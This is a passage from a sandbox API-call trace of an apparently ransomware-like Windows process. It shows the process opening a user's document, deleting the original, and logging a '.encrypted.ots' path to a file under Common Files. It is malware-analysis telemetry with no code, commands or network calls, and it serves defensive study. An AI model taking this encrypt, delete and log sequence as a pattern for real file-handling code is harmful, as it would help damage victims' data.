ftLastAccessTime.dwHighDateTime=0x1d5c388, ftLastWriteTime.dwLowDateTime=0xcc4266d0, ftLastWriteTime.dwHighDateTime=0x1d5c388, nFileSizeHigh=0x0, nFileSizeLow=0x16907, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Ol52nfGJKPYhFqmJCtG.ots", cAlternateFileName="OL52NF~1.OTS")) returned 0x7c2240 [0035.757] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0035.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0035.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.758] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.758] CharLowerBuffW (in: lpsz="byte[92423]", cchLength=0xb | out: lpsz="byte[92423]") returned 0xb [0035.758] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.758] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0035.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.758] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.758] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0035.758] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0035.758] FreeLibrary (hLibModule=0x76b40000) returned 1 [0035.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0035.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0035.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0035.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0035.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0035.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0035.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0035.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0035.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0035.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0035.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0035.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0035.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0035.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0035.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0035.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0035.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.759] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.759] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.759] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.759] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0035.759] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.759] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.759] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.759] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.759] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.760] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.760] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.760] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.760] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.760] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.760] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.760] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.760] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.760] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.760] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.760] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.760] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0035.760] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.760] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\ol52nfgjkpyhfqmjctg.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0035.760] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.760] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.760] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.760] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.760] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0035.761] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.761] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.761] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.761] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.761] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.761] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.761] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.761] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.761] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0035.761] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.762] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.762] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.762] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.762] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.762] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.762] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.762] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots", lpFilePart=0x0) returned 0x66 [0035.762] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x573040a0, ftCreationTime.dwHighDateTime=0x1d5b5f6, ftLastAccessTime.dwLowDateTime=0xcc4266d0, ftLastAccessTime.dwHighDateTime=0x1d5c388, ftLastWriteTime.dwLowDateTime=0x15073560, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x16907, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Ol52nfGJKPYhFqmJCtG.ots", cAlternateFileName="OL52NF~1.OTS")) returned 0x7c2240 [0035.762] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\ol52nfgjkpyhfqmjctg.ots")) returned 1 [0035.764] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x573040a0, ftCreationTime.dwHighDateTime=0x1d5b5f6, ftLastAccessTime.dwLowDateTime=0xcc4266d0, ftLastAccessTime.dwHighDateTime=0x1d5c388, ftLastWriteTime.dwLowDateTime=0x15073560, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x16907, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Ol52nfGJKPYhFqmJCtG.ots", cAlternateFileName="OL52NF~1.OTS")) returned 0 [0035.764] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0035.764] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.764] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0035.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0035.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0035.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0035.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0035.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0035.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0035.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.764] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.765] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0035.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0035.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.765] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.765] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.765] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ots", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.765] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ots", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.765] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.765] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0035.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0035.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.765] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0035.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.765] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0035.765] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.766] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.766] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0035.766] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.766] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.766] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0035.766] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x1b15, lpOverlapped=0x0) returned 1 [0035.766] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0035.766] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x1b15, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.766] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0035.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.encrypted.ots\r\n", cchWideChar=115, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 115 [0035.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x73) returned 0x7800d0 [0035.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.encrypted.ots\r\n", cchWideChar=115, lpMultiByteStr=0x7800d0, cbMultiByte=115, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\Ol52nfGJKPYhFqmJCtG.encrypted.ots\r\n", lpUsedDefaultChar=0x0) returned 115 [0035.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0035.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0035.767] WriteFile (in: hFile=0x128, lpBuffer=0x7d5b30*, nNumberOfBytesToWrite=0x72, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7d5b30*, lpNumberOfBytesWritten=0x6aee3c*=0x72, lpOverlapped=0x0) returned 1 [0035.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0035.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.767] CloseHandle (hObject=0x128) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0035.768] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0035.768] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0035.768] HeapFree (in: hHeap=0x770000, 